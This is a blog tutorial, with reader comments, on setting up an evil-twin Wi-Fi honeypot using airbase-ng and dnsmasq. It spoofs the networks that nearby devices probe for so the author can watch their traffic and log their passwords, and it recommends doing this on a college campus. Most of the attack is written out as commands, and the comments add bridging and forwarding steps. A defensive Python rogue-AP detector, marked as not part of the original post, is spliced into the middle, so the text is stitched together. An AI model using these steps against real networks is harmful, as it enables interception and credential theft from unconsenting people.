Thursday, July 18, 2013

MITM - WIFI HONEYPOT

Well, today after a long time I am writing a tutorial. I had even bought www.achutetech.com for a year, but I didn't post anything there so it just lapsed. I am sorry for not keeping up, but now I am trying to continue this blog by posting about the things that I am trying these days...

Let's cut the crap and start off with our hacking. :D

What are we doing today?

Today we will create a fake Wi-Fi hotspot so that clients connect to it and we can see what they are up to, even log their Facebook or any other web service passwords if they happen to use those services on our hotspot.

Where can we use this?

Well, you can use it anywhere there are lots of Wi-Fi users around, i.e. laptops and smartphones that have their Wi-Fi on and are searching for Wi-Fi networks. I would recommend places like a college campus; well, I use it there :D

Um... so what's the tech behind it?

You will act as a legitimate Wi-Fi hotspot, providing free Internet access to everyone :). For those who connect, you will monitor all their traffic and then forward it to the real server; you will be acting as a man in the middle,
intercepting every packet, even changing it to suit your needs, forwarding it to the real server and forwarding the replies back to the client.

[CLIENT] <-------------> [ YOU ] <------------> [INTERNET] 

What are the tools required?

I use Linux and I suggest you do too, so I will be using Kali Linux. It's a Linux distribution in which all the tools required for hacking are usually pre-installed.

  1. Linux OS
  2. Wi-Fi adapter that can host an access point (airbase-ng needs a driver with monitor mode support)
  3. Internet connection
  4. A little bit of patience
  5. And this site of course, to guide you ;)
If you have all these tools of the trade, let's get started.

Software Required 

If you have Kali Linux, or even BackTrack, or any distribution which has the aircrack-ng suite of tools, then you are good. Otherwise you need to install it from here - http://www.aircrack-ng.org/ - or you can open your terminal / console and type

apt-get update
apt-get install aircrack-ng 

NOTE: even Kali and BackTrack users, I suggest you use dnsmasq [instead of dhcp3-server or dhcpd] and install it once again even if it's already installed.

Next you need dnsmasq; to get it, type

apt-get install dnsmasq
Now you are ready. Let's start.

Setting Up

First we need to gather some information. Plug in your USB Wi-Fi adapter if you have one and in the terminal / console type

ifconfig

You should see something like this on your screen
   
There you will see wlan0 or even wlan1 [if you have an extra Wi-Fi adapter]. Take note of which one you have and then type
  
airmon-ng start wlan0
or
airmon-ng start wlan1

depending on what you have. You should see (monitor mode enabled on mon0).

Now that's done, let's proceed.
Next we need to monitor the airwaves to get the names of the Wi-Fi access points the clients are trying to connect to. To do that, type

airodump-ng mon0

You should see a few clients, and under the PROBE column you will find the name of the access point each client is trying to connect to. In this example we see that the client is searching for the Wi-Fi access point named achutetech.

So we will create a fake AP with the name achutetech and try to make the client connect to us. To do this we type
 

airbase-ng --essid achutetech mon0

In our example we see this:

We have successfully created a fake AP, and a client has associated with it. But the client will still not be fully connected to our AP, since we haven't provided it with an IP address. To do that we use dnsmasq.

Note: I have tried using dhcpd or dhcp3-server, but they seem to be error-prone while configuring them, and I was getting errors like "Interface name is too long" and so on, so I switched to dnsmasq and it seems to work great :D
  
To verify that we have dnsmasq, type
 

whereis dnsmasq

and to see whether we have the configuration file or not [I have noticed that even though dnsmasq was installed on Kali, it didn't have the dnsmasq.conf file, so to get it type apt-get install dnsmasq]

and to verify that we have the config file, type

ls /etc/ | grep dnsmasq

If dnsmasq.conf is returned, then all is well and good. But if not, try

apt-get install dnsmasq

OK, now that we have dnsmasq we need to configure a few things. Type

vim /etc/dnsmasq.conf

[How to use vim - I will be writing a quick tutorial on it soon ]
Now scroll down to around line 90; you should see

# interface=

change it to

interface=at0

[at0 is the tap interface that airbase-ng created for our fake AP]

Now scroll down even further to line 141; you should see

#dhcp-range=192.168.0.50,192.168.0.150,12h

Just remove the #. This range (192.168.0.50 to 192.168.0.150) must lie in the same subnet as the address we give at0 in the next step (192.168.0.1); dnsmasq only hands out leases from a range that matches an address on the interface it listens on.

And you are good to go :D

Now we have to give our router [i.e. the fake AP interface at0] an IP address.

to do so type

ifconfig at0 192.168.0.1 up

and to start the DHCP service, type

dnsmasq

Now your clients should be able to get an IP address for themselves.
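As an added defender-side example (not code from the original post), here is a small Python check that flags the kind of evil twin set up above: a second BSSID beaconing a managed SSID such as achutetech, open where the real network is encrypted. The inventory, the scan records and every BSSID value in it are constructed for the example.

```python
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    ssid: str
    bssid: str
    reason: str


# Constructed inventory of the APs a defender actually operates: SSID -> authorised
# BSSIDs and the security mode they are configured with.
KNOWN_APS = {
    "achutetech": {"bssids": {"00:11:22:33:44:55"}, "privacy": "WPA2"},
}

# Constructed scan records (one per beacon), with the columns a sensor running
# airodump-ng would show as ESSID/BSSID/CH/ENC. The second "achutetech" entry
# imitates the airbase-ng twin from the post: an unknown BSSID and no encryption.
SCAN = [
    {"ssid": "achutetech", "bssid": "00:11:22:33:44:55", "channel": 6, "privacy": "WPA2"},
    {"ssid": "achutetech", "bssid": "de:ad:be:ef:00:01", "channel": 1, "privacy": "OPN"},
    {"ssid": "guest-net", "bssid": "aa:bb:cc:dd:ee:01", "channel": 11, "privacy": "OPN"},
]


def detect_rogue_aps(scan, known=KNOWN_APS):
    """Return findings for beacons that contradict the inventory or each other."""
    findings = []
    seen_privacy = defaultdict(set)  # ssid -> set of security modes observed
    for rec in scan:
        ssid, bssid, priv = rec["ssid"], rec["bssid"].lower(), rec["privacy"]
        seen_privacy[ssid].add(priv)
        if ssid not in known:
            continue  # SSIDs we do not operate are not judged by the inventory check
        policy = known[ssid]
        if bssid not in {b.lower() for b in policy["bssids"]}:
            findings.append(Finding(ssid, bssid, "unknown BSSID advertising a managed SSID"))
        if priv != policy["privacy"]:
            findings.append(Finding(ssid, bssid,
                                    f"security mismatch: saw {priv}, expected {policy['privacy']}"))
    # Inventory-free heuristic: one SSID beaconing with mixed security modes is the
    # signature of an open twin standing next to the real, encrypted network.
    for ssid, modes in seen_privacy.items():
        if len(modes) > 1:
            findings.append(Finding(ssid, "*", f"SSID seen with mixed security modes {sorted(modes)}"))
    return findings
```

The mixed-mode heuristic also catches a twin of an SSID that is not in the inventory, which is why it runs over every SSID in the scan rather than only the managed ones.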

We have finished the configuration part for now. The fun part will be in the next post :D

Part two is ready - here is the link:

MITM - WIFI Honeypot part 2



If you have any problems so far, do comment below; I will try my best to reply. Thanks.


10 comments:

  1. Help!

    I have got a problem.
    It says failed to bind dhcp server socket. Already in use

  2. I get the access point started, but when I try to connect to it they are not getting any IP addresses. Don't know what's wrong... need help figuring this out.

  3. Help! I get the access point started but clients aren't assigned any IP addresses. When I try to use the browser on the associated machine it says no internet connection.

  4. @Angchung: That means another service is using the same port. My best guess: restart your laptop and try once more. If the problem persists, I will try to solve it on my laptop and let you know.

  5. @Kemp Ross: If the other devices are not getting an IP address, that means something is wrong with the DHCP server. Please read the above-mentioned steps to configure dnsmasq. If it still fails, I will be happy to guide you.

  6. How do I share the internet connection (from eth0, wlan1/0, pppoe0) to at0? It is no use if the victim doesn't get internet when connecting to our fake AP. (I did read part 2.)

    1. Yes, in order to do that we need to bridge the interfaces using the "brctl" command.

      It is generally not available in Kali Linux, so you need to install it using
      "apt-get install bridge-utils"

      Try searching for the brctl command in Google. If you aren't able to do it, I will try to recreate the scenario on my own laptop and let you know.

  7. My devices don't get an IP. The .config is as you described. And it looks like the server is starting. I've been trying to make a rogue AP for almost a week now, and your guide is by far the easiest and most self-explanatory. But please help me and the others with the IP problem.

  9. This is another method I don't get to work; can anyone see what I'm doing wrong?

    $ ifconfig

    #My internet is coming from wlan1 "inet addr:192.168.0.104 Bcast:192.168.0.255 Mask:255.255.255.0"


    $ airmon-ng start wlan0
    $ airbase-ng --essid "FakeAP" mon0

    ######This far everything is OK, I can see the "FakeAP" from other computers. But I need to assign IPs.

    #Verify details of logical access point interface
    $ ifconfig at0

    at0 Link encap:Ethernet HWaddr 10:08:b1:1e:be:b7
    BROADCAST MULTICAST MTU:1500 Metric:1
    RX packets:0 errors:0 dropped:0 overruns:0 frame:0
    TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:500
    RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)



    #Create a bridge interface (To check, I've bridged at0 to wlan1 (internet) and wlan0 (mon0))
    $ brctl addbr myBridge

    #Now, associate real interfaces (wlan1 and at0) to bridge interfaces
    #I needed to run this command to make it work: $ iw dev wlan1 set 4addr on
    $ brctl addif myBridge wlan1
    $ brctl addif myBridge at0

    #Verify details of new bridge interface
    $ brctl show

    #bridge name bridge id STP enabled interfaces
    #myBridge 8000.1008b11ebeb7 no at0
    wlan1

    ######Looks like wlan1 (internet) and at0 ("FakeAP"?) are connected.


    #Remove the IP address of wlan1 and at0 interfaces
    $ ifconfig wlan1 0.0.0.0 up
    $ ifconfig at0 0.0.0.0 up

    #Assign IP address to bridge interface we have created earlier. You can use your old wlan0 IP address or assign any IP free address on your network
    $ ifconfig myBridge 192.168.0.104/8 up

    $ ifconfig myBridge
    myBridge Link encap:Ethernet HWaddr 10:08:b1:1e:be:b7
    inet addr:192.168.0.104 Bcast:192.255.255.255 Mask:255.0.0.0
    inet6 addr: fe80::1208:b1ff:fe1e:beb7/64 Scope:Link
    UP BROADCAST MULTICAST MTU:1500 Metric:1
    RX packets:0 errors:0 dropped:0 overruns:0 frame:0
    TX packets:8 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:0
    RX bytes:0 (0.0 B) TX bytes:648 (648.0 B)

    ######It looks like my bridge has an assigned IP, the one from wlan1.

    #Enable IP forwarding on your computer. In other word, your computer will work as a router. IT will perform NATing.
    $ echo 1 > /proc/sys/net/ipv4/ip_forward

    ######Try to restart "FakeAP"

    $ airbase-ng --essid "FakeAP" mon0
    16:06:20 Created tap interface at0
    16:06:20 Trying to set MTU on at0 to 1500
    16:06:20 Access Point with BSSID 10:08:B1:1E:BE:B7 started.
    Error: Got channel -1, expected a value > 0.
    16:06:26 Client 00:E3:B2:C2:3B:F0 associated (unencrypted) to ESSID: "FakeAP"
    16:06:26 Client 00:E3:B2:C2:3B:F0 associated (unencrypted) to ESSID: "FakeAP"
    16:06:26 Client 00:E3:B2:C2:3B:F0 associated (unencrypted) to ESSID: "FakeAP"

    ######And the latest lines just repeat themselves, and the computer trying to connect doesn't get an IP. What am I doing wrong?

